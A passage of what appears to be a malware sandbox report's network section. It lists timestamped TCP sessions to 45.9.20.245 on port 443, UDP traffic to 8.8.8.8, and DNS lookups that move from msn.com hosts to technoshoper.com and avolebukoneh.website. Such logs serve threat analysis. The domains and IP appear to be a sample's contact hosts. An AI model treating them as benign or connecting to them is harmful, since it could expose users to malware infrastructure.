                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.623857021 CET4435002445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.623955965 CET50024443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.624543905 CET50024443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.624558926 CET4435002445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.688169956 CET4435002445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689389944 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689454079 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.689542055 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.690299034 CET50025443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.690318108 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.751769066 CET4435002545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753623962 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753670931 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.753748894 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.754585028 CET50026443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.754601002 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793507099 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793546915 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.793626070 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.794195890 CET50027443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.794210911 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.815529108 CET4435002645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816690922 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816726923 CET4435002845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816822052 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.817363977 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.817378998 CET4435002845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.856792927 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.857927084 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.857980013 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858077049 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858623981 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858653069 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.877779007 CET4435002845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.921844959 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923079967 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923142910 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923269033 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923890114 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923909903 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.988581896 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990401983 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990478992 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990586996 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.991166115 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.991199017 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:58.054924011 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565155983 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565208912 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565677881 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.566430092 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.566457987 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.628473043 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630089045 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630135059 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630244017 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.631280899 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.631304026 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.695075035 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696522951 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696552992 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696660042 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.697467089 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.697484016 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.762360096 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764590025 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764622927 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764751911 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.766201019 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.766215086 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.827748060 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.466831923 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.466867924 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.467072964 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.468127012 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.468138933 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.530230045 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533447027 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533485889 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533559084 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.534154892 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.534189939 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.597475052 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601181984 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601227045 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601335049 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601979971 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601994038 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.662882090 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.666153908 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.666188002 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667088032 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667815924 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667825937 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.727704048 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663892984 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663925886 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663999081 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.664815903 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.664829016 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.728840113 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.729985952 CET50074443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.730015039 CET4435007445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.730081081 CET50074443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.730799913 CET50074443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.730809927 CET4435007445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.794344902 CET4435007445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.798125982 CET50075443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.798182011 CET4435007545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.798307896 CET50075443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.799105883 CET50075443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.799129009 CET4435007545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.860374928 CET4435007545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.861543894 CET50076443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.861624956 CET4435007645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.861732960 CET50076443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.862313986 CET50076443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.862348080 CET4435007645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.924309969 CET4435007645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.206008911 CET50077443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.206093073 CET4435007745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.206253052 CET50077443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.225517035 CET50077443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.225545883 CET4435007745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.286737919 CET4435007745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.289182901 CET50078443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.289222956 CET4435007845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.292207003 CET50078443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.293174028 CET50078443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.293189049 CET4435007845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.357187986 CET4435007845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.358409882 CET50079443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.358463049 CET4435007945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.358788013 CET50079443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.359577894 CET50079443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.359612942 CET4435007945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.422331095 CET4435007945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.423861027 CET50080443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.423933029 CET4435008045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.424043894 CET50080443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.424578905 CET50080443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.424613953 CET4435008045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.484978914 CET4435008045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.787131071 CET50081443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.787184954 CET4435008145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.787288904 CET50081443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.788026094 CET50081443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.788043976 CET4435008145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.849627018 CET4435008145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.851305962 CET50082443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.851353884 CET4435008245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.851475954 CET50082443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.852360010 CET50082443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.852371931 CET4435008245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.913604021 CET4435008245.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.915184021 CET50083443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.915236950 CET4435008345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.915337086 CET50083443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.916052103 CET50083443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.916073084 CET4435008345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.978440046 CET4435008345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.980395079 CET50084443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.980444908 CET4435008445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.981802940 CET50084443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.982795954 CET50084443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.982815027 CET4435008445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:34.045176983 CET4435008445.9.20.245192.168.2.6

                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Nov 23, 2021 10:51:36.761096954 CET6034253192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:42.627621889 CET5838453192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:43.641735077 CET6026153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:43.664618015 CET53602618.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:51:49.603517056 CET5606153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:49.626315117 CET53560618.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:51:50.182585955 CET5833653192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:53.210439920 CET5406453192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:51:53.231761932 CET53540648.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:51:59.316274881 CET5281153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.899028063 CET5033953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.920825005 CET53503398.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:43.953464985 CET5932953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:43.977089882 CET53593298.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.298163891 CET6402153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.321031094 CET53640218.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.325711966 CET5612953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.348301888 CET53561298.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.386729002 CET5817753192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.408608913 CET53581778.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.933254004 CET5070053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.951196909 CET53507008.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:53:57.756691933 CET6117853192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:53:57.780173063 CET53611788.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.584307909 CET5701753192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.604422092 CET53570178.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.181210041 CET5632753192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.202909946 CET53563278.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.959935904 CET5024353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:07.980220079 CET53502438.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.200695992 CET6436753192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.225646019 CET53643678.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.647783995 CET5506653192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:15.668725014 CET53550668.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:18.801898003 CET5657053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:18.823904991 CET53565708.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:25.476068020 CET5518053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:25.496202946 CET53551808.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.076216936 CET5024853192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.097043991 CET53502488.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.809657097 CET6441353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.829816103 CET53644138.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:37.067101002 CET6042953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:37.100219011 CET53604298.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:40.575599909 CET6034553192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:40.596667051 CET53603458.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:46.143867016 CET5873053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:46.166496992 CET53587308.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.428843975 CET5383053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.453711987 CET53538308.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.528775930 CET5722653192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.549573898 CET53572268.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:51.183243036 CET5392653192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:51.203574896 CET53539268.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:56.538692951 CET6553153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:56.558392048 CET53655318.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.601921082 CET6543753192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.621939898 CET53654378.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.770467043 CET5459053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.791332006 CET53545908.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.542634010 CET5131853192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.562652111 CET53513188.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.000895023 CET6457553192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.021049023 CET53645758.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.252931118 CET5909253192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.274789095 CET53590928.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.061213017 CET5748353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.081146955 CET53574838.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.446316004 CET4980953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.464086056 CET53498098.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.780441046 CET5607153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.800038099 CET53560718.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.643714905 CET5895053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.661693096 CET53589508.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.182122946 CET5703553192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.203749895 CET53570358.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.765352011 CET5412253192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.785058975 CET53541228.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.797801018 CET5675953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.817606926 CET53567598.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.938874960 CET5922053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.958785057 CET53592208.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.500597954 CET6221153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.519731998 CET53622118.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.059487104 CET6203353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.079997063 CET53620338.8.8.8192.168.2.6

                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                              Nov 23, 2021 10:51:36.761096954 CET192.168.2.68.8.8.80x2273Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:42.627621889 CET192.168.2.68.8.8.80xb094Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:43.641735077 CET192.168.2.68.8.8.80xd93aStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:49.603517056 CET192.168.2.68.8.8.80xcbe0Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:50.182585955 CET192.168.2.68.8.8.80x5b22Standard query (0)assets.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:53.210439920 CET192.168.2.68.8.8.80x37cfStandard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:51:59.316274881 CET192.168.2.68.8.8.80xc8e4Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:52:20.899028063 CET192.168.2.68.8.8.80xf03bStandard query (0)btloader.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:43.953464985 CET192.168.2.68.8.8.80xfcdeStandard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:44.298163891 CET192.168.2.68.8.8.80x8bb6Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:47.325711966 CET192.168.2.68.8.8.80xa6c6Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.386729002 CET192.168.2.68.8.8.80xf1c2Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:54.933254004 CET192.168.2.68.8.8.80x76e0Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:53:57.756691933 CET192.168.2.68.8.8.80xd7f5Standard query (0)avolebukoneh.websiteA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:04.584307909 CET192.168.2.68.8.8.80xd5e9Standard query (0)technoshoper.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:05.181210041 CET192.168.2.68.8.8.80xa9bdStandard query (0)technoshoper.comA (IP address)IN (0x0001)
